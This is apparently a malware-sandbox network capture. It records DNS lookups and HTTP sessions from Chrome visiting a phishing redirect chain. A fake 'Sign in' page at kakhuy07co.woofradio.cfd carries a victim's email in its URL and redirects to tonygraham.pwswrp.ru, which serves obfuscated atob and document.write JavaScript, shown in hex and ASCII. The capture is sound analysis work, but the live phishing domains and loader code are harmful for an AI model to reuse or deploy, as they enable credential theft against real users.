                      Mar 17, 2025 18:19:47.031132936 CET49682443192.168.2.620.190.159.68
                      Mar 17, 2025 18:19:47.037705898 CET80496842.23.77.188192.168.2.6
                      Mar 17, 2025 18:19:47.037813902 CET4968480192.168.2.62.23.77.188
                      Mar 17, 2025 18:19:47.037837029 CET4434968220.190.159.68192.168.2.6
                      Mar 17, 2025 18:19:47.037878990 CET49682443192.168.2.620.190.159.68
                      Mar 17, 2025 18:20:17.063615084 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:17.063663006 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:17.063743114 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:17.063939095 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:17.063949108 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:17.717447042 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:17.717878103 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:17.717920065 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:27.620508909 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:27.620580912 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:20:27.620702982 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:28.047629118 CET49728443192.168.2.6142.250.185.132
                      Mar 17, 2025 18:20:28.047657013 CET44349728142.250.185.132192.168.2.6
                      Mar 17, 2025 18:21:21.961847067 CET49679443192.168.2.620.191.45.158
                      TimestampSource PortDest PortSource IPDest IP
                      Mar 17, 2025 18:18:12.646330118 CET53571771.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:12.654006004 CET53600911.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:13.669454098 CET53588931.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:13.788252115 CET53650011.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:16.937943935 CET5230653192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:16.937943935 CET6148853192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:16.944602013 CET53614881.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:16.944977999 CET53523061.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:19.178857088 CET5802053192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:19.179019928 CET5130453192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:19.194576025 CET5951553192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:19.194737911 CET6289953192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:19.202934027 CET53513041.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:19.209530115 CET53580201.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:19.210643053 CET53628991.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:19.217864990 CET53595151.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:20.062896967 CET6298753192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:20.063168049 CET5091053192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:20.072746992 CET53629871.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:20.118278027 CET53509101.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:22.124623060 CET6064753192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:22.125144958 CET6286453192.168.2.61.1.1.1
                      Mar 17, 2025 18:18:22.131661892 CET53606471.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:22.133883953 CET53628641.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:30.806556940 CET53503351.1.1.1192.168.2.6
                      Mar 17, 2025 18:18:49.886334896 CET53604301.1.1.1192.168.2.6
                      Mar 17, 2025 18:19:05.209328890 CET138138192.168.2.6192.168.2.255
                      Mar 17, 2025 18:19:12.249156952 CET53641741.1.1.1192.168.2.6
                      Mar 17, 2025 18:19:12.273211002 CET53594341.1.1.1192.168.2.6
                      Mar 17, 2025 18:19:15.805259943 CET53566981.1.1.1192.168.2.6
                      Mar 17, 2025 18:19:42.069550991 CET53646541.1.1.1192.168.2.6
                      Mar 17, 2025 18:20:28.055969954 CET53597951.1.1.1192.168.2.6
                      TimestampSource IPDest IPChecksumCodeType
                      Mar 17, 2025 18:18:20.118415117 CET192.168.2.61.1.1.1c2e4(Port unreachable)Destination Unreachable
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Mar 17, 2025 18:18:16.937943935 CET192.168.2.61.1.1.10x7685Standard query (0)www.google.com65IN (0x0001)false
                      Mar 17, 2025 18:18:16.937943935 CET192.168.2.61.1.1.10xb46Standard query (0)www.google.comA (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.178857088 CET192.168.2.61.1.1.10x2039Standard query (0)kakhuy07co.woofradio.cfdA (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.179019928 CET192.168.2.61.1.1.10x1964Standard query (0)kakhuy07co.woofradio.cfd65IN (0x0001)false
                      Mar 17, 2025 18:18:19.194576025 CET192.168.2.61.1.1.10x409aStandard query (0)kakhuy07co.woofradio.cfdA (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.194737911 CET192.168.2.61.1.1.10x912eStandard query (0)kakhuy07co.woofradio.cfd65IN (0x0001)false
                      Mar 17, 2025 18:18:20.062896967 CET192.168.2.61.1.1.10x1f62Standard query (0)tonygraham.pwswrp.ruA (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.063168049 CET192.168.2.61.1.1.10xfc87Standard query (0)tonygraham.pwswrp.ru65IN (0x0001)false
                      Mar 17, 2025 18:18:22.124623060 CET192.168.2.61.1.1.10x45b7Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:22.125144958 CET192.168.2.61.1.1.10xed69Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Mar 17, 2025 18:18:16.944602013 CET1.1.1.1192.168.2.60xb46No error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:16.944977999 CET1.1.1.1192.168.2.60x7685No error (0)www.google.com65IN (0x0001)false
                      Mar 17, 2025 18:18:19.202934027 CET1.1.1.1192.168.2.60x1964No error (0)kakhuy07co.woofradio.cfd65IN (0x0001)false
                      Mar 17, 2025 18:18:19.209530115 CET1.1.1.1192.168.2.60x2039No error (0)kakhuy07co.woofradio.cfd104.21.2.147A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.209530115 CET1.1.1.1192.168.2.60x2039No error (0)kakhuy07co.woofradio.cfd172.67.129.81A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.210643053 CET1.1.1.1192.168.2.60x912eNo error (0)kakhuy07co.woofradio.cfd65IN (0x0001)false
                      Mar 17, 2025 18:18:19.217864990 CET1.1.1.1192.168.2.60x409aNo error (0)kakhuy07co.woofradio.cfd172.67.129.81A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:19.217864990 CET1.1.1.1192.168.2.60x409aNo error (0)kakhuy07co.woofradio.cfd104.21.2.147A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.32.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.48.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.16.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.112.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.64.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.96.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.072746992 CET1.1.1.1192.168.2.60x1f62No error (0)tonygraham.pwswrp.ru104.21.80.1A (IP address)IN (0x0001)false
                      Mar 17, 2025 18:18:20.118278027 CET1.1.1.1192.168.2.60xfc87No error (0)tonygraham.pwswrp.ru65IN (0x0001)false
                      Mar 17, 2025 18:18:22.131661892 CET1.1.1.1192.168.2.60x45b7No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                      • kakhuy07co.woofradio.cfd
                        • tonygraham.pwswrp.ru
                      • a.nel.cloudflare.com
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.649702172.67.129.814437740C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-03-17 17:18:19 UTC1085OUTGET /3IgjcDhi7bbLzyqNi74Dxtc1XOq0HV69zuTXLXqnhnYexhMqaslCucBcrtlUAvSaQSHXMHYR05jmstE6iCIFE9U9189WjNjjz6aD13nD5x0ol5cOZZSgb1syufIVGxpC2vKAj025i7NnVFZ9WFKa4eQvR2G4GQlt0NUGhxzukbWwHVKybFjbIYtqNcss36hvXYTTWP3N/YbDwc0zBR3huOXy35f8itseSalgK7rTTlIvJq1ijGxpNl40QvAaRigeNv9w4WgQtfwqU0MZf0ZjFmo6q1zQTQ4McS3cwVqHVdgJViZ0qzMmzR113GzSYhuROL0CvhNuzfR8MwDRER9IzVQyErpcLEotUxoDX7vUphdcT8zYuYxxljaaSPR7ffLs4A1GIZ6QkHtGNWsGY/ddimaano@tonygraham.com HTTP/1.1
                      Host: kakhuy07co.woofradio.cfd
                      Connection: keep-alive
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                      2025-03-17 17:18:19 UTC853INHTTP/1.1 200 OK
                      Date: Mon, 17 Mar 2025 17:18:19 GMT
                      Content-Type: text/html
                      Transfer-Encoding: chunked
                      Connection: close
                      Last-Modified: Sun, 16 Mar 2025 19:45:07 GMT
                      Accept-Ranges: bytes
                      cf-cache-status: DYNAMIC
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bGcYek40vmInfZuaog8jaead%2BMwVSh5nC6iyLqc1Y6ikYoglDRHOj9Ft8EtQI9LZc%2BP4I0aaXDLTHXUQDaRBxXJAvFLMFCOzrBU7al6wdU1ms3UX1NAb8UfFz8%2BlkKCQ0M4OarRpM42RAYI%3D"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      Server: cloudflare
                      CF-RAY: 921e261dae2f42a3-EWR
                      alt-svc: h3=":443"; ma=86400
                      server-timing: cfL4;desc="?proto=TCP&rtt=1603&min_rtt=1590&rtt_var=622&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1679&delivery_rate=1721698&cwnd=142&unsent_bytes=0&cid=81005583ec21a37b&ts=297&x=0"
                      2025-03-17 17:18:19 UTC516INData Raw: 38 31 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 67 65 6e 65 72 61 74 65 20 72 61 6e 64 6f 6d 20 61 6c 70 68 61 6e 75 6d 65 72 69 63 20 63 68 61 72 61 63 74 65 72
                      Data Ascii: 810<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Sign in</title> <script> // Function to generate random alphanumeric character
                      2025-03-17 17:18:19 UTC1369INData Raw: 65 72 73 2e 63 68 61 72 41 74 28 4d 61 74 68 2e 66 6c 6f 6f 72 28 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 20 2a 20 63 68 61 72 61 63 74 65 72 73 2e 6c 65 6e 67 74 68 29 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 72 65 73 75 6c 74 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 46 75 6e 63 74 69 6f 6e 20 74 6f 20 65 78 74 72 61 63 74 20 73 75 62 64 6f 6d 61 69 6e 20 66 72 6f 6d 20 65 6d 61 69 6c 20 28 62 65 74 77 65 65 6e 20 40 20 61 6e 64 20 2e 29 0d 0a 20 20 20 20 20 20 20 20 66 75 6e 63 74 69 6f 6e 20 65 78 74 72 61 63 74 53 75 62 64 6f 6d 61 69 6e 28 65 6d 61 69 6c 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2f 20 43 68 65 63 6b 20 69 66 20
                      Data Ascii: ers.charAt(Math.floor(Math.random() * characters.length)); } return result; } // Function to extract subdomain from email (between @ and .) function extractSubdomain(email) { // Check if
                      2025-03-17 17:18:19 UTC186INData Raw: 72 61 6e 64 6f 6d 53 74 72 69 6e 67 31 7d 24 7b 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 76 61 6c 75 65 29 7d 60 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 52 65 64 69 72 65 63 74 20 74 6f 20 74 68 65 20 6e 65 77 20 55 52 4c 20 69 6e 73 74 61 6e 74 6c 79 0d 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6e 65 77 55 72 6c 3b 0d 0a 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                      Data Ascii: randomString1}${encodeURIComponent(value)}`; // Redirect to the new URL instantly window.location.href = newUrl; </script></head><body></body></html>
                      2025-03-17 17:18:19 UTC5INData Raw: 30 0d 0a 0d 0a
                      Data Ascii: 0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.649705104.21.32.14437740C:\Program Files\Google\Chrome\Application\chrome.exe
                      TimestampBytes transferredDirectionData
                      2025-03-17 17:18:20 UTC710OUTGET /8T8x6LF1E/ HTTP/1.1
                      Host: tonygraham.pwswrp.ru
                      Connection: keep-alive
                      sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"
                      sec-ch-ua-mobile: ?0
                      sec-ch-ua-platform: "Windows"
                      Upgrade-Insecure-Requests: 1
                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                      Sec-Fetch-Site: cross-site
                      Sec-Fetch-Mode: navigate
                      Sec-Fetch-Dest: document
                      Referer: https://kakhuy07co.woofradio.cfd/
                      Accept-Encoding: gzip, deflate, br, zstd
                      Accept-Language: en-US,en;q=0.9
                      2025-03-17 17:18:21 UTC1216INHTTP/1.1 200 OK
                      Date: Mon, 17 Mar 2025 17:18:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: close
                      Cache-Control: no-cache, private
                      cf-cache-status: DYNAMIC
                      vary: accept-encoding
                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=alc1%2FyGEDv0Sh2xOCCZPV4zrQXgSMHGRhosHf6iJtE4sFc3YA3zu1T6bON9Vun0gNzM2XpJ6lX3iJ6e6cqkeKTN5N0XhsjWN762%2FE4%2FI0Npd96%2B6JfbYZf2FlqvkQTWKENCb"}],"group":"cf-nel","max_age":604800}
                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                      server-timing: cfL4;desc="?proto=TCP&rtt=43355&min_rtt=43320&rtt_var=16316&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2820&recv_bytes=1608&delivery_rate=66412&cwnd=251&unsent_bytes=0&cid=03430a57bce3a476&ts=202&x=0"
                      Set-Cookie: XSRF-TOKEN=eyJpdiI6IjFJTU9NK21wdENOYWFzVzV2cjNqWEE9PSIsInZhbHVlIjoiSVZid21IWmo0cWJrT293NVlKME1MQ0F6d3N4Q2xOYWp0TzREcGNidGdyd0phbElhMm1FUHNPQmIzb3BwL3pHUFlFWlZEYnhhcmpQSkRxdUloRmRRRkJBdnVyQy9NRVNqTHRZUUVMVnlya0VmdWMzZDh2TitmQjcxWUZqLzJERU4iLCJtYWMiOiI0YzJmN2EwYzgwODUxYTMzNDhjMTBmZmE3N2JhZjI0ZDQyNWYyYjg3YTkwYzU1ZmEwYWI1ZjUyNTlmOGEyOGU1IiwidGFnIjoiIn0%3D; expires=Mon, 17-Mar-2025 19:18:21 GMT; Max-Age=7200; path=/; secure; samesite=none
                      2025-03-17 17:18:21 UTC762INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 6c 61 72 61 76 65 6c 5f 73 65 73 73 69 6f 6e 3d 65 79 4a 70 64 69 49 36 49 6d 56 43 52 7a 46 4d 61 56 42 72 53 45 4a 61 4d 57 6c 76 4f 54 4e 79 4d 58 68 47 63 6e 63 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 5a 55 52 33 64 6c 4a 6c 63 46 42 34 53 57 46 59 4e 6e 6b 7a 61 55 31 6d 59 6d 4d 79 56 6e 6c 77 64 6d 4a 55 4e 43 74 57 53 33 45 30 51 57 56 57 63 30 74 4d 52 6a 64 4f 63 33 4e 79 54 45 78 68 5a 6b 78 42 65 6a 45 32 4f 57 30 33 4d 6d 52 70 63 48 46 6b 52 55 56 35 64 57 70 55 63 58 64 6e 53 45 78 31 64 6b 4e 51 55 55 74 53 53 45 31 4e 59 7a 63 31 57 45 68 6d 62 57 64 44 63 48 52 52 59 57 6c 72 54 7a 64 57 53 6d 70 31 56 6b 56 6b 63 55 78 52 61 30 68 76 4e 45 34 35 62 47 39 79 61 32 74 51 4f 55 74 42 59 57 63
                      Data Ascii: Set-Cookie: laravel_session=eyJpdiI6ImVCRzFMaVBrSEJaMWlvOTNyMXhGcnc9PSIsInZhbHVlIjoiZUR3dlJlcFB4SWFYNnkzaU1mYmMyVnlwdmJUNCtWS3E0QWVWc0tMRjdOc3NyTExhZkxBejE2OW03MmRpcHFkRUV5dWpUcXdnSEx1dkNQUUtSSE1NYzc1WEhmbWdDcHRRYWlrTzdWSmp1VkVkcUxRa0hvNE45bG9ya2tQOUtBYWc
                      2025-03-17 17:18:21 UTC1369INData Raw: 37 66 66 39 0d 0a 3c 73 63 72 69 70 74 3e 0a 4d 5a 76 69 71 43 75 54 53 46 20 3d 20 61 74 6f 62 28 22 61 48 52 30 63 48 4d 36 4c 79 39 53 64 6b 51 75 63 48 64 7a 64 33 4a 77 4c 6e 4a 31 4c 30 55 31 56 6d 34 77 4c 77 3d 3d 22 29 3b 0a 69 73 4e 43 68 62 55 6d 57 52 20 3d 20 61 74 6f 62 28 22 62 6d 39 74 59 58 52 6a 61 41 3d 3d 22 29 3b 0a 6c 6e 55 42 77 71 41 6c 67 48 20 3d 20 61 74 6f 62 28 22 64 33 4a 70 64 47 55 3d 22 29 3b 0a 69 66 28 4d 5a 76 69 71 43 75 54 53 46 20 3d 3d 20 69 73 4e 43 68 62 55 6d 57 52 29 7b 0a 64 6f 63 75 6d 65 6e 74 5b 6c 6e 55 42 77 71 41 6c 67 48 5d 28 64 65 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 65 73 63 61 70 65 28 61 74 6f 62 28 27 50 43 46 45 54 30 4e 55 57 56 42 46 49 47 68 30 62 57 77 2b 43 6a 78 6f 64 47 31 73
                      Data Ascii: 7ff9<script>MZviqCuTSF = atob("aHR0cHM6Ly9SdkQucHdzd3JwLnJ1L0U1Vm4wLw==");isNChbUmWR = atob("bm9tYXRjaA==");lnUBwqAlgH = atob("d3JpdGU=");if(MZviqCuTSF == isNChbUmWR){document[lnUBwqAlgH](decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+CjxodG1s
                      2025-03-17 17:18:21 UTC1369INData Raw: 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37
                      Data Ascii: 6g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk44Wk44Wk776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk7
                      2025-03-17 17:18:21 UTC1369INData Raw: 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34
                      Data Ascii: k776g776g776g776g44Wk776g776g776g776g776g776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk776g44Wk776g776g44Wk776g44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk776g776g44Wk776g44Wk44
                      2025-03-17 17:18:21 UTC1369INData Raw: 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36
                      Data Ascii: 776g776g44Wk44Wk776g44Wk44Wk776g44Wk44Wk776g776g776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk776g776g44Wk44Wk776g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk776g776
                      2025-03-17 17:18:21 UTC1369INData Raw: 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b
                      Data Ascii: 4Wk776g776g776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g776g776g776g44Wk776g44Wk44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk776g44Wk776g44Wk44Wk44Wk776g44Wk776g776g776g776g44Wk44Wk44Wk776g44Wk776g776g44Wk
                      2025-03-17 17:18:21 UTC1369INData Raw: 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 37 37 36 67 34 34 57 6b 37 37 36 67 37 37 36 67 37 37 36 67 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37 37 36 67 34 34 57 6b 34 34 57 6b 34 34 57 6b 37
                      Data Ascii: 6g776g44Wk776g44Wk776g776g776g776g776g44Wk776g776g776g44Wk776g776g44Wk44Wk776g44Wk776g44Wk44Wk776g44Wk44Wk776g776g44Wk776g44Wk776g44Wk44Wk44Wk44Wk776g776g44Wk776g44Wk44Wk776g776g44Wk776g776g776g44Wk44Wk776g44Wk44Wk44Wk44Wk776g44Wk44Wk44Wk776g44Wk44Wk44Wk7
